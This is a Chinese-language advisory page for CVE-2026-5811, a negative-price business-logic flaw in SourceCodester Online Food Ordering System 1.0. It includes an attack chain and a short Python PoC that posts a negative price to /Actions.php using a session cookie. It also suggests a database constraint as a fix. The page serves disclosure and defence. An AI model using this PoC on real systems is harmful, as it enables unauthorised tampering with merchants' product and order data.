CVE-2026-5811 CVSS 5.4 中危

CVE-2026-5811 SourceCodester订餐系统业务逻辑漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5811

漏洞类型

业务逻辑错误

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Online Food Ordering System

漏洞概述

SourceCodester Online Food Ordering System 1.0版本存在业务逻辑漏洞。问题出在/Actions.php文件的save_product函数中，该函数处理POST参数时未对价格参数进行有效验证。攻击者可远程利用此漏洞，通过操纵价格参数导致业务逻辑错误，破坏系统完整性和可用性。

技术细节

该漏洞位于SourceCodester Online Food Ordering System 1.0的/Actions.php文件中，具体影响save_product函数。该函数负责处理产品保存请求，特别是对POST请求中的“price”参数处理不当。由于缺乏服务器端的输入验证和业务逻辑校验，攻击者可以提交包含负值或非预期数值的“price”参数。根据CVSS向量分析，该漏洞利用难度低（AC:L），且需要低权限用户账号（PR:L）。攻击者利用此漏洞可绕过正常的业务限制，将产品价格修改为负数。这种业务逻辑缺陷不仅破坏了数据的完整性（I:L），还可能导致系统计算逻辑混乱，影响可用性（A:L）。虽然CVSS向量显示机密性未受影响（C:N），但该漏洞已存在公开利用代码，风险可控但需及时修复。

攻击链分析

STEP 1

1. 信息收集

识别运行SourceCodester Online Food Ordering System 1.0的目标网站，并获取一个有效的低权限用户账户。

STEP 2

2. 漏洞利用

使用低权限账户登录，捕获有效的Session ID。向/Actions.php发送POST请求，在save_product函数中将price参数修改为负数。

STEP 3

3. 业务逻辑破坏

服务器端接收并处理该请求，未验证价格的有效性，导致负价格数据被写入数据库，破坏系统业务逻辑完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: SourceCodester Online Food Ordering System 1.0 - Business Logic Error (Negative Price)
# Date: 2026-04-08
# Reference: https://github.com/meifukun/Web-Security-PoCs

import requests

def exploit(target_url, session_id):
    headers = {
        "Cookie": f"PHPSESSID={session_id}",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # Payload data manipulating the price parameter
    payload = {
        "save_product": "true",
        "product_name": "Malicious Product",
        "price": -999.99, # Setting negative price to trigger business logic error
        "description": "Exploit"
    }
    
    response = requests.post(f"{target_url}/Actions.php", data=payload, headers=headers)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Failed to send payload.")

if __name__ == "__main__":
    # Example usage
    target = "http://example.com"
    session = "valid_session_id_here"
    exploit(target, session)

影响范围

SourceCodester Online Food Ordering System 1.0

防御指南

临时缓解措施

建议管理员在代码修复前，通过数据库约束（如CHECK约束）确保产品价格字段不得小于0，同时审计现有产品数据以排除已被篡改的异常价格。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表